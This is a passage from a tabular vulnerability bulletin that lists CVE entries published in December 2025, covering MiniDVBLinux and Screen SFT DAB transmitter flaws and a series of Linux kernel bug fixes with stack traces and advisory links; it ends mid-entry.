| MiniDVBLinux--MiniDVBLinux | MiniDVBLinux 5.4 contains an arbitrary file disclosure vulnerability that allows attackers to read sensitive system files through the 'file' GET parameter. Attackers can exploit the about page by supplying file paths to disclose arbitrary file contents on the affected device. | 2025-12-09 | not yet calculated | CVE-2023-53772 | ExploitDB-51097 MiniDVBLinux Product Homepage Zero Science Lab Disclosure (ZSL-2022-5719) VulnCheck Advisory: MiniDVBLinux 5.4 Arbitrary File Read Vulnerability via About Page |
| MiniDVBLinux--MiniDVBLinux | MiniDVBLinux 5.4 contains an unauthenticated vulnerability in the tv_action.sh script that allows remote attackers to generate live stream snapshots through the Simple VDR Protocol. Attackers can request /tpl/tv_action.sh to create and retrieve a live TV screenshot stored in /var/www/images/tv.jpg without authentication. | 2025-12-09 | not yet calculated | CVE-2023-53773 | ExploitDB-51095 MiniDVBLinux Product Homepage Zero Science Lab Disclosure (ZSL-2022-5716) VulnCheck Advisory: MiniDVBLinux 5.4 Unauthenticated Live Stream Disclosure via tv_action.sh |
| MiniDVBLinux--Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit | MiniDVBLinux 5.4 contains a remote code execution vulnerability in the SVDRP protocol that allows remote attackers to send commands to manipulate TV systems. Attackers can send crafted SVDRP commands through the svdrpsend.sh script to execute messages and potentially control the video disk recorder remotely. | 2025-12-09 | not yet calculated | CVE-2023-53774 | ExploitDB-51093 SVDRP Documentation Zero Science Lab Disclosure (ZSL-2022-5714) MiniDVBLinux Product Homepage VulnCheck Advisory: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol Remote Code Execution |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB Series - Compact Radio DAB Transmitter | Screen SFT DAB 1.9.3 contains an authentication bypass vulnerability that allows attackers to change user passwords by exploiting weak session management controls. Attackers can reuse IP-bound session identifiers to issue unauthorized requests to the userManager API and modify user credentials without proper authentication. | 2025-12-10 | not yet calculated | CVE-2023-53775 | ExploitDB-51456 Screen Product Homepage DB Broadcast Official Product Page DB Broadcast Website Zero Science Advisory URL VulnCheck Advisory: Screen SFT DAB 1.9.3 Authentication Bypass via Session Management Weakness |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB Series - Compact Radio DAB Transmitter | Screen SFT DAB 1.9.3 contains an authentication bypass vulnerability that allows attackers to exploit weak session management by reusing IP-bound session identifiers. Attackers can issue unauthorized requests to the device management API by leveraging the session binding mechanism to perform critical operations on the transmitter. | 2025-12-10 | not yet calculated | CVE-2023-53776 | ExploitDB-51459 Product Homepage Vendor Homepage Product Homepage Vendor Advisory URL VulnCheck Advisory: Screen SFT DAB 1.9.3 Authentication Bypass via Session Management Weakness |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: kill hooked chains to avoid loops on deduplicated compressed images After heavily stressing EROFS with several images which include a hand-crafted image of repeated patterns for more than 46 days, I found two chains could be linked with each other almost simultaneously and form a loop so that the entire loop won't be submitted. As a consequence, the corresponding file pages will remain locked forever. It can be _only_ observed on data-deduplicated compressed images. For example, consider two chains with five pclusters in total: Chain 1: 2->3->4->5 -- The tail pcluster is 5; Chain 2: 5->1->2 -- The tail pcluster is 2. Chain 2 could link to Chain 1 with pcluster 5; and Chain 1 could link to Chain 2 at the same time with pcluster 2. Since hooked chains are all linked locklessly now, I have no idea how to simply avoid the race. Instead, let's avoid hooked chains completely until I could work out a proper way to fix this and end users finally tell us that it's needed to add it back. Actually, this optimization can be found with multi-threaded workloads (especially even more often on deduplicated compressed images), yet I'm not sure about the overall system impacts of not having this compared with implementation complexity. | 2025-12-09 | not yet calculated | CVE-2023-53777 | https://git.kernel.org/stable/c/d3b39ea24835ac03da1a30f93ae7c05d55a40191 https://git.kernel.org/stable/c/b5b0d52f00e4bacb0ebdf47cd7016b0485fffad2 https://git.kernel.org/stable/c/10c2b98a40d9044a3e97f4697ca6213bad7e19c2 https://git.kernel.org/stable/c/967c28b23f6c89bb8eef6a046ea88afe0d7c1029 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/qaic: Clean up integer overflow checking in map_user_pages() The encode_dma() function has some validation on in_trans->size but it would be more clear to move those checks to find_and_map_user_pages(). The encode_dma() had two checks: if (in_trans->addr + in_trans->size < in_trans->addr || !in_trans->size) return -EINVAL; The in_trans->addr variable is the starting address. The in_trans->size variable is the total size of the transfer. The transfer can occur in parts and the resources->xferred_dma_size tracks how many bytes we have already transferred. This patch introduces a new variable "remaining" which represents the amount we want to transfer (in_trans->size) minus the amount we have already transferred (resources->xferred_dma_size). I have modified the check for if in_trans->size is zero to instead check if in_trans->size is less than resources->xferred_dma_size. If we have already transferred more bytes than in_trans->size then there are negative bytes remaining which doesn't make sense. If there are zero bytes remaining to be copied, just return success. The check in encode_dma() checked that "addr + size" could not overflow and barring a driver bug that should work, but it's easier to check if we do this in parts. First check that "in_trans->addr + resources->xferred_dma_size" is safe. Then check that "xfer_start_addr + remaining" is safe. My final concern was that we are dealing with u64 values but on 32bit systems the kmalloc() function will truncate the sizes to 32 bits. So I calculated "total = in_trans->size + offset_in_page(xfer_start_addr);" and returned -EINVAL if it were >= SIZE_MAX. This will not affect 64bit systems. | 2025-12-09 | not yet calculated | CVE-2023-53778 | https://git.kernel.org/stable/c/d410a96e5cb8c1ec7049c83f2edcd8bbfaf5d9b3 https://git.kernel.org/stable/c/96d3c1cadedb6ae2e8965e19cd12caa244afbd9c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mfd: dln2: Fix memory leak in dln2_probe() When dln2_setup_rx_urbs() in dln2_probe() fails, error out_free forgets to call usb_put_dev() to decrease the refcount of dln2->usb_dev. Fix this by adding usb_put_dev() in the error handling code of dln2_probe(). | 2025-12-09 | not yet calculated | CVE-2023-53779 | https://git.kernel.org/stable/c/aa5a8673d71124e7dcdd497ec2accebc15bd6ca3 https://git.kernel.org/stable/c/71fa6f134d13822a5dd906327de04aad8e903e49 https://git.kernel.org/stable/c/1e453cb55014367a84655203c31d57dfa87e005e https://git.kernel.org/stable/c/6a1a72a8cfdad6911a7167405b63545ad781fbe2 https://git.kernel.org/stable/c/1fa3fb4f70184254af437ccd59fd1c091a90d518 https://git.kernel.org/stable/c/77f43c014a770c4dcbdeed7cda6884c29382eb0f https://git.kernel.org/stable/c/fa045c911f0bfc0305c71618ab5630153faf86a4 https://git.kernel.org/stable/c/96da8f148396329ba769246cb8ceaa35f1ddfc48 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: fix FCLK pstate change underflow [Why] Currently we set FCLK p-state change watermark calculated based on dummy p-state latency when UCLK p-state is not supported [How] Calculate FCLK p-state change watermark based on on FCLK pstate change latency in case UCLK p-state is not supported | 2025-12-09 | not yet calculated | CVE-2023-53780 | https://git.kernel.org/stable/c/4bdfa48d74649898468a0bf5c8b8a48dded77b4a https://git.kernel.org/stable/c/6853d56dba56d1c24db403ff3885c71e18d572c4 https://git.kernel.org/stable/c/972243f973eb0821084e5833d5f7f4ed025f42da |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smc: Fix use-after-free in tcp_write_timer_handler(). With Eric's ref tracker, syzbot finally found a repro for use-after-free in tcp_write_timer_handler() by kernel TCP sockets. [0] If SMC creates a kernel socket in __smc_create(), the kernel socket is supposed to be freed in smc_clcsock_release() by calling sock_release() when we close() the parent SMC socket. However, at the end of smc_clcsock_release(), the kernel socket's sk_state might not be TCP_CLOSE. This means that we have not called inet_csk_destroy_sock() in __tcp_close() and have not stopped the TCP timers. The kernel socket's TCP timers can be fired later, so we need to hold a refcnt for net as we do for MPTCP subflows in mptcp_subflow_create_socket(). [0]: leaked reference. sk_alloc (./include/net/net_namespace.h:335 net/core/sock.c:2108) inet_create (net/ipv4/af_inet.c:319 net/ipv4/af_inet.c:244) __sock_create (net/socket.c:1546) smc_create (net/smc/af_smc.c:3269 net/smc/af_smc.c:3284) __sock_create (net/socket.c:1546) __sys_socket (net/socket.c:1634 net/socket.c:1618 net/socket.c:1661) __x64_sys_socket (net/socket.c:1672) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) ================================================================== BUG: KASAN: slab-use-after-free in tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594) Read of size 1 at addr ffff888052b65e0d by task syzrepro/18091 CPU: 0 PID: 18091 Comm: syzrepro Tainted: G W 6.3.0-rc4-01174-gb5d54eb5899a #7 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.amzn2022.0.1 04/01/2014 Call Trace: <IRQ> dump_stack_lvl (lib/dump_stack.c:107) print_report (mm/kasan/report.c:320 mm/kasan/report.c:430) kasan_report (mm/kasan/report.c:538) tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594) tcp_write_timer (./include/linux/spinlock.h:390 net/ipv4/tcp_timer.c:643) call_timer_fn (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/timer.h:127 kernel/time/timer.c:1701) __run_timers.part.0 (kernel/time/timer.c:1752 kernel/time/timer.c:2022) run_timer_softirq (kernel/time/timer.c:2037) __do_softirq (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/irq.h:142 kernel/softirq.c:572) __irq_exit_rcu (kernel/softirq.c:445 kernel/softirq.c:650) irq_exit_rcu (kernel/softirq.c:664) sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1107 (discriminator 14)) </IRQ> | 2025-12-09 | not yet calculated | CVE-2023-53781 | https://git.kernel.org/stable/c/1cc41c8acfc1ee30b4868559058db97fa44b0137 https://git.kernel.org/stable/c/9744d2bf19762703704ecba885b7ac282c02eacf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dccp: Fix out of bounds access in DCCP error handler There was a previous attempt to fix an out-of-bounds access in the DCCP error handlers, but that fix assumed that the error handlers only want to access the first 8 bytes of the DCCP header. Actually, they also look at the DCCP sequence number, which is stored beyond 8 bytes, so an explicit pskb_may_pull() is required. | 2025-12-09 | not yet calculated | CVE-2023-53782 | https://git.kernel.org/stable/c/3533e10272555c422a7d51ebc0ce8c483429f7f2 https://git.kernel.org/stable/c/177212bf6dc1ff2d13d0409cddc5c9e81feec63d https://git.kernel.org/stable/c/7a7dd70cb954d3efa706a429687ded88c02496fa https://git.kernel.org/stable/c/4b8a938e329ae4eb54b73b0c87b5170607b038a8 https://git.kernel.org/stable/c/6ecf09699eb1554299aa1e7fd13e9e80f656c2f9 https://git.kernel.org/stable/c/f8a7f10a1dccf9868ff09342a73dce27501b86df https://git.kernel.org/stable/c/d8171411a661253e6271fa10b65b46daf1b6471c https://git.kernel.org/stable/c/ec620c34f5fa5d055f9f6136a387755db6157712 https://git.kernel.org/stable/c/977ad86c2a1bcaf58f01ab98df5cc145083c489c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-iocost: fix divide by 0 error in calc_lcoefs() echo max of u64 to cost.model can cause divide by 0 error. # echo 8:0 rbps=18446744073709551615 > /sys/fs/cgroup/io.cost.model divide error: 0000 [#1] PREEMPT SMP RIP: 0010:calc_lcoefs+0x4c/0xc0 Call Trace: <TASK> ioc_refresh_params+0x2b3/0x4f0 ioc_cost_model_write+0x3cb/0x4c0 ? _copy_from_iter+0x6d/0x6c0 ? kernfs_fop_write_iter+0xfc/0x270 cgroup_file_write+0xa0/0x200 kernfs_fop_write_iter+0x17d/0x270 vfs_write+0x414/0x620 ksys_write+0x73/0x160 __x64_sys_write+0x1e/0x30 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x63/0xcd calc_lcoefs() uses the input value of cost.model in DIV_ROUND_UP_ULL, overflow would happen if bps plus IOC_PAGE_SIZE is greater than ULLONG_MAX, it can cause divide by 0 error. Fix the problem by setting basecost | 2025-12-09 | not yet calculated | CVE-2023-53783 | https://git.kernel.org/stable/c/9e8bf9f95f7a299fa9ea45b678d001806ad5e12c https://git.kernel.org/stable/c/6e291810fe83a384700eb24a1f714966391ed562 https://git.kernel.org/stable/c/3538ade9d8c2ba41088e395de916f2599fadba8f https://git.kernel.org/stable/c/bf8eb1fd6110871e6232e8e7efe399276ef7e6f6 https://git.kernel.org/stable/c/b96d7b4a9745fbd0c8384608ceb1f50415e862fa https://git.kernel.org/stable/c/984af1e66b4126cf145153661cc24c213e2ec231 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm: bridge: dw_hdmi: fix connector access for scdc Commit 5d844091f237 ("drm/scdc-helper: Pimp SCDC debugs") changed the scdc interface to pick up an i2c adapter from a connector instead. However, in the case of dw-hdmi, the wrong connector was being used to pass i2c adapter information, since dw-hdmi's embedded connector structure is only populated when the bridge attachment callback explicitly asks for it. drm-meson is handling connector creation, so this won't happen, leading to a NULL pointer dereference. Fix it by having scdc functions access dw-hdmi's current connector pointer instead, which is assigned during the bridge enablement stage. [narmstrong: moved Fixes tag before first S-o-b and added Reported-by tag] | 2025-12-09 | not yet calculated | CVE-2023-53784 | https://git.kernel.org/stable/c/552f79aa9e801ed4f74d6b3221af78042ba4f235 https://git.kernel.org/stable/c/98703e4e061fb8715c7613cd227e32cdfd136b23 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mt76: mt7921: don't assume adequate headroom for SDIO headers mt7921_usb_sdio_tx_prepare_skb() calls mt7921_usb_sdio_write_txwi() and mt7921_skb_add_usb_sdio_hdr(), both of which blindly assume that adequate headroom will be available in the passed skb. This assumption typically is satisfied when the skb was allocated in the net core for transmission via the mt7921 netdev (although even that is only an optimization and is not strictly guaranteed), but the assumption is sometimes not satisfied when the skb originated in the receive path of another netdev and was passed through to the mt7921, such as by the bridge layer. Blindly prepending bytes to an skb is always wrong. This commit introduces a call to skb_cow_head() before the call to mt7921_usb_sdio_write_txwi() in mt7921_usb_sdio_tx_prepare_skb() to ensure that at least MT_SDIO_TXD_SIZE + MT_SDIO_HDR_SIZE bytes can be pushed onto the skb. Without this fix, I can trivially cause kernel panics by bridging an MT7921AU-based USB 802.11ax interface with an Ethernet interface on an Intel Atom-based x86 system using its onboard RTL8169 PCI Ethernet adapter and also on an ARM-based Raspberry Pi 1 using its onboard SMSC9512 USB Ethernet adapter. Note that the panics do not occur in every system configuration, as they occur only if the receiving netdev leaves less headroom in its received skbs than the mt7921 needs for its SDIO headers. Here is an example stack trace of this panic on Raspberry Pi OS Lite 2023-02-21 running kernel 6.1.24+ [1]: skb_panic from skb_push+0x44/0x48 skb_push from mt7921_usb_sdio_tx_prepare_skb+0xd4/0x190 [mt7921_common] mt7921_usb_sdio_tx_prepare_skb [mt7921_common] from mt76u_tx_queue_skb+0x94/0x1d0 [mt76_usb] mt76u_tx_queue_skb [mt76_usb] from __mt76_tx_queue_skb+0x4c/0xc8 [mt76] __mt76_tx_queue_skb [mt76] from mt76_txq_schedule.part.0+0x13c/0x398 [mt76] mt76_txq_schedule.part.0 [mt76] from mt76_txq_schedule_all+0x24/0x30 [mt76] mt76_txq_schedule_all [mt76] from mt7921_tx_worker+0x58/0xf4 [mt7921_common] mt7921_tx_worker [mt7921_common] from __mt76_worker_fn+0x9c/0xec [mt76] __mt76_worker_fn [mt76] from kthread+0xbc/0xe0 kthread from ret_from_fork+0x14/0x34 After this fix, bridging the mt7921 interface works fine on both of my previously problematic systems. [1] https://github.com/raspberrypi/firmware/tree/5c276f55a4b21345cd4d6200a504ee991851ff7a | 2025-12-09 | not yet calculated | CVE-2023-53785 | https://git.kernel.org/stable/c/5c8bbb79c7cbca65534badf360f3b1145759c7bc https://git.kernel.org/stable/c/414c0c04703423b78bc9dea1aa6493334dc61f6e https://git.kernel.org/stable/c/98c4d0abf5c478db1ad126ff0c187dbb84c0803c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm flakey: fix a crash with invalid table line This command will crash with NULL pointer dereference: dmsetup create flakey --table \ "0 `blockdev --getsize /dev/ram0` flakey /dev/ram0 0 0 1 2 corrupt_bio_byte 512" Fix the crash by checking if arg_name is non-NULL before comparing it. | 2025-12-09 | not yet calculated | CVE-2023-53786 | https://git.kernel.org/stable/c/f95cb1526669ccdf7eb12eefd57a893953e3595f https://git.kernel.org/stable/c/12849ed107c0b2869fb775c81208050899006f07 https://git.kernel.org/stable/c/337b7af273562b73c46ef77a724604ad139ca762 https://git.kernel.org/stable/c/a1e3fffe02e05c05357af91364ac0fc1ed425b5b https://git.kernel.org/stable/c/f76fcb9d43ec014ac4a1bb983768696d5b032df9 https://git.kernel.org/stable/c/cb874a190f3f7c3c3fa5b979bee7a3b8cc3a19cc https://git.kernel.org/stable/c/83b4e3d878ea6be9aec1d5a1ab177c766c64d1a0 https://git.kernel.org/stable/c/8258d84a7917aeece773716518deadb7ad776cb7 https://git.kernel.org/stable/c/98dba02d9a93eec11bffbb93c7c51624290702d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: da9063: fix null pointer deref with partial DT config When some of the da9063 regulators do not have corresponding DT nodes a null pointer dereference occurs on boot because such regulators have no init_data causing the pointers calculated in da9063_check_xvp_constraints() to be invalid. Do not dereference them in this case. | 2025-12-09 | not yet calculated | CVE-2023-53787 | https://git.kernel.org/stable/c/04a025b17d83d07924e5e32508c72536ab8f42d9 https://git.kernel.org/stable/c/98e2dd5f7a8be5cb2501a897e96910393a49f0ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: hda/ca0132: fixup buffer overrun at tuning_ctl_set() tuning_ctl_set() might have buffer overrun at (X) if it didn't break from loop by matching (A). static int tuning_ctl_set(...) { for (i = 0; i < TUNING_CTLS_COUNT; i++) (A) if (nid == ca0132_tuning_ctls[i].nid) break; snd_hda_power_up(...); (X) dspio_set_param(..., ca0132_tuning_ctls[i].mid, ...); snd_hda_power_down(...); ^ return 1; } We will get below error by cppcheck sound/pci/hda/patch_ca0132.c:4229:2: note: After for loop, i has value 12 for (i = 0; i < TUNING_CTLS_COUNT; i++) ^ sound/pci/hda/patch_ca0132.c:4234:43: note: Array index out of bounds dspio_set_param(codec, ca0132_tuning_ctls[i].mid, 0x20, ^ This patch cares non match case. | 2025-12-09 | not yet calculated | CVE-2023-53788 | https://git.kernel.org/stable/c/ff5e8b49348f6a550c136b74efaf8b3c1d3ceaea https://git.kernel.org/stable/c/3590498117a11aa1f92a97e8a04d95320e347ebd https://git.kernel.org/stable/c/7f12f99b8017ad5ed5aff4b0aefe3bb7bbdf8a99 https://git.kernel.org/stable/c/baef27176ea5fdc7ad0947e2dc7733855e35db71 https://git.kernel.org/stable/c/d23f65f08247068576a01e28b297e995b7dc3965 https://git.kernel.org/stable/c/32854bc91ae7debcdefdc7ae881ed83385a04792 https://git.kernel.org/stable/c/734a3deb6614e3597e7e9ef7fb6006c593c5ee18 https://git.kernel.org/stable/c/98e5eb110095ec77cb6d775051d181edbf9cd3cf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/amd: Improve page fault error reporting If IOMMU domain for device group is not setup properly then we may hit IOMMU page fault. Current page fault handler assumes that domain is always setup and it will hit NULL pointer derefence (see below sample log). Lets check whether domain is setup or not and log appropriate message. Sample log: ---------- amdgpu 0000:00:01.0: amdgpu: SE 1, SH per SE 1, CU per SH 8, active_cu_number 6 BUG: kernel NULL pointer dereference, address: 0000000000000058 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 2 PID: 56 Comm: irq/24-AMD-Vi Not tainted 6.2.0-rc2+ #89 Hardware name: xxx RIP: 0010:report_iommu_fault+0x11/0x90 [...] Call Trace: <TASK> amd_iommu_int_thread+0x60c/0x760 ? __pfx_irq_thread_fn+0x10/0x10 irq_thread_fn+0x1f/0x60 irq_thread+0xea/0x1a0 ? preempt_count_add+0x6a/0xa0 ? __pfx_irq_thread_dtor+0x10/0x10 ? __pfx_irq_thread+0x10/0x10 kthread+0xe9/0x110 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x2c/0x50 </TASK> [joro: Edit commit message] | 2025-12-09 | not yet calculated | CVE-2023-53789 | https://git.kernel.org/stable/c/be8301e2d5a8b95c04ae8e35d7bfee7b0f03f83a https://git.kernel.org/stable/c/446080b353f048b1fddaec1434cb3d27b5de7efe https://git.kernel.org/stable/c/996d120b4de2b0d6b592bd9fbbe6e244b81ab3cc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Zeroing allocated object from slab in bpf memory allocator Currently the freed element in bpf memory allocator may be immediately reused, for htab map the reuse will reinitialize special fields in map value (e.g., bpf_spin_lock), but lookup procedure may still access these special fields, and it may lead to hard-lockup as shown below: NMI backtrace for cpu 16 CPU: 16 PID: 2574 Comm: htab.bin Tainted: G L 6.1.0+ #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), RIP: 0010:queued_spin_lock_slowpath+0x283/0x2c0 ...... Call Trace: <TASK> copy_map_value_locked+0xb7/0x170 bpf_map_copy_value+0x113/0x3c0 __sys_bpf+0x1c67/0x2780 __x64_sys_bpf+0x1c/0x20 do_syscall_64+0x30/0x60 entry_SYSCALL_64_after_hwframe+0x46/0xb0 ...... </TASK> For htab map, just like the preallocated case, these is no need to initialize these special fields in map value again once these fields have been initialized. For preallocated htab map, these fields are initialized through __GFP_ZERO in bpf_map_area_alloc(), so do the similar thing for non-preallocated htab in bpf memory allocator. And there is no need to use __GFP_ZERO for per-cpu bpf memory allocator, because __alloc_percpu_gfp() does it implicitly. | 2025-12-09 | not yet calculated | CVE-2023-53790 | https://git.kernel.org/stable/c/678ea18d6240299fd77d7000c8b1d7e5f274c8af https://git.kernel.org/stable/c/5d447e04290e78bdc1a3a6c321320d384e09c2f1 https://git.kernel.org/stable/c/997849c4b969034e225153f41026657def66d286 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md: fix warning for holder mismatch from export_rdev() Commit a1d767191096 ("md: use mddev->external to select holder in export_rdev()") fix the problem that 'claim_rdev' is used for blkdev_get_by_dev() while 'rdev' is used for blkdev_put(). However, if mddev->external is changed from 0 to 1, then 'rdev' is used for blkdev_get_by_dev() while 'claim_rdev' is used for blkdev_put(). And this problem can be reporduced reliably by following: New file: mdadm/tests/23rdev-lifetime devname=${dev0##*/} devt=`cat /sys/block/$devname/dev` pid="" runtime=2 clean_up_test() { pill -9 $pid echo clear > /sys/block/md0/md/array_state } trap 'clean_up_test' EXIT add_by_sysfs() { while true; do echo $devt > /sys/block/md0/md/new_dev done } remove_by_sysfs(){ while true; do echo remove > /sys/block/md0/md/dev-${devname}/state done } echo md0 > /sys/module/md_mod/parameters/new_array || die "create md0 failed" add_by_sysfs & pid="$pid $!" remove_by_sysfs & pid="$pid $!" sleep $runtime exit 0 Test cmd: ./test --save-logs --logdir=/tmp/ --keep-going --dev=loop --tests=23rdev-lifetime Test result: ------------[ cut here ]------------ WARNING: CPU: 0 PID: 960 at block/bdev.c:618 blkdev_put+0x27c/0x330 Modules linked in: multipath md_mod loop CPU: 0 PID: 960 Comm: test Not tainted 6.5.0-rc2-00121-g01e55c376936-dirty #50 RIP: 0010:blkdev_put+0x27c/0x330 Call Trace: <TASK> export_rdev.isra.23+0x50/0xa0 [md_mod] mddev_unlock+0x19d/0x300 [md_mod] rdev_attr_store+0xec/0x190 [md_mod] sysfs_kf_write+0x52/0x70 kernfs_fop_write_iter+0x19a/0x2a0 vfs_write+0x3b5/0x770 ksys_write+0x74/0x150 __x64_sys_write+0x22/0x30 do_syscall_64+0x40/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd Fix the problem by recording if 'rdev' is used as holder. | 2025-12-09 | not yet calculated | CVE-2023-53791 | https://git.kernel.org/stable/c/99fcd427178d0f58f5520f8f01df727f8eaeb2c7 https://git.kernel.org/stable/c/99892147f028d711f9d40fefad4f33632593864c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-core: fix memory leak in dhchap_ctrl_secret Free dhchap_secret in nvme_ctrl_dhchap_ctrl_secret_store() before we return when nvme_auth_generate_key() returns error. | 2025-12-09 | not yet calculated | CVE-2023-53792 | https://git.kernel.org/stable/c/43d0724d756a13694f612a8a151f835ad6425b93 https://git.kernel.org/stable/c/39b90fc75943406d2bd60fd1ea041aca2559cc5f https://git.kernel.org/stable/c/6ec30a62789913b1bd0f0d44ea4d0d2d5608b1e8 https://git.kernel.org/stable/c/99c2dcc8ffc24e210a3aa05c204d92f3ef460b05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf tool x86: Fix perf_env memory leak Found by leak sanitizer: ``` ==1632594==ERROR: LeakSanitizer: detected memory leaks Direct leak of 21 byte(s) in 1 object(s) allocated from: #0 0x7f2953a7077b in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cpp:439 #1 0x556701d6fbbf in perf_env__read_cpuid util/env.c:369 #2 0x556701d70589 in perf_env__cpuid util/env.c:465 #3 0x55670204bba2 in x86__is_amd_cpu arch/x86/util/env.c:14 #4 0x5567020487a2 in arch__post_evsel_config arch/x86/util/evsel.c:83 #5 0x556701d8f78b in evsel__config util/evsel.c:1366 #6 0x556701ef5872 in evlist__config util/record.c:108 #7 0x556701cd6bcd in test__PERF_RECORD tests/perf-record.c:112 #8 0x556701cacd07 in run_test tests/builtin-test.c:236 #9 0x556701cacfac in test_and_print tests/builtin-test.c:265 #10 0x556701cadddb in __cmd_test tests/builtin-test.c:402 #11 0x556701caf2aa in cmd_test tests/builtin-test.c:559 #12 0x556701d3b557 in run_builtin tools/perf/perf.c:323 #13 0x556701d3bac8 in handle_internal_command tools/perf/perf.c:377 #14 0x556701d3be90 in run_argv tools/perf/perf.c:421 #15 0x556701d3c3f8 in main tools/perf/perf.c:537 #16 0x7f2952a46189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 SUMMARY: AddressSanitizer: 21 byte(s) leaked in 1 allocation(s). ``` | 2025-12-09 | not yet calculated | CVE-2023-53793 | https://git.kernel.org/stable/c/75d65c1cc439606ada882755fd205d13c2c7907d https://git.kernel.org/stable/c/010139bfc6bb9ddab81dbc2cf71cd3a9c28adc7f https://git.kernel.org/stable/c/f3daf02a41e3c11e1a473517a8a6169248fb8e7b https://git.kernel.org/stable/c/99d4850062a84564f36923764bb93935ef2ed108 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: fix session state check in reconnect to avoid use-after-free issue Don't collect exiting session in smb2_reconnect_server(), because it will be released soon. Note that the exiting session will stay in server->smb_ses_list until it complete the cifs_free_ipc() and logoff() and then delete itself from the list. | 2025-12-09 | not yet calculated | CVE-2023-53794 | https://git.kernel.org/stable/c/7e4f5c3f01fb0e51ca438e43262d858daf9a0a76 https://git.kernel.org/stable/c/759ffc164d95a32c09528766d74d9b4fb054e8f4 https://git.kernel.org/stable/c/99f280700b4cc02d5f141b8d15f8e9fad0418f65 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: IOMMUFD_DESTROY should not increase the refcount syzkaller found a race where IOMMUFD_DESTROY increments the refcount: obj = iommufd_get_object(ucmd->ictx, cmd->id, IOMMUFD_OBJ_ANY); if (IS_ERR(obj)) return PTR_ERR(obj); iommufd_ref_to_users(obj); /* See iommufd_ref_to_users() */ if (!iommufd_object_destroy_user(ucmd->ictx, obj)) As part of the sequence to join the two existing primitives together. Allowing the refcount the be elevated without holding the destroy_rwsem violates the assumption that all temporary refcount elevations are protected by destroy_rwsem. Racing IOMMUFD_DESTROY with iommufd_object_destroy_user() will cause spurious failures: WARNING: CPU: 0 PID: 3076 at drivers/iommu/iommufd/device.c:477 iommufd_access_destroy+0x18/0x20 drivers/iommu/iommufd/device.c:478 Modules linked in: CPU: 0 PID: 3076 Comm: syz-executor.0 Not tainted 6.3.0-rc1-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/03/2023 RIP: 0010:iommufd_access_destroy+0x18/0x20 drivers/iommu/iommufd/device.c:477 Code: e8 3d 4e 00 00 84 c0 74 01 c3 0f 0b c3 0f 1f 44 00 00 f3 0f 1e fa 48 89 fe 48 8b bf a8 00 00 00 e8 1d 4e 00 00 84 c0 74 01 c3 <0f> 0b c3 0f 1f 44 00 00 41 57 41 56 41 55 4c 8d ae d0 00 00 00 41 RSP: 0018:ffffc90003067e08 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff888109ea0300 RCX: 0000000000000000 RDX: 0000000000000001 RSI: 0000000000000000 RDI: 00000000ffffffff RBP: 0000000000000004 R08: 0000000000000000 R09: ffff88810bbb3500 R10: ffff88810bbb3e48 R11: 0000000000000000 R12: ffffc90003067e88 R13: ffffc90003067ea8 R14: ffff888101249800 R15: 00000000fffffffe FS: 00007ff7254fe6c0(0000) GS:ffff888237c00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000555557262da8 CR3: 000000010a6fd000 CR4: 0000000000350ef0 Call Trace: <TASK> iommufd_test_create_access drivers/iommu/iommufd/selftest.c:596 [inline] iommufd_test+0x71c/0xcf0 drivers/iommu/iommufd/selftest.c:813 iommufd_fops_ioctl+0x10f/0x1b0 drivers/iommu/iommufd/main.c:337 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:870 [inline] __se_sys_ioctl fs/ioctl.c:856 [inline] __x64_sys_ioctl+0x84/0xc0 fs/ioctl.c:856 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x38/0x80 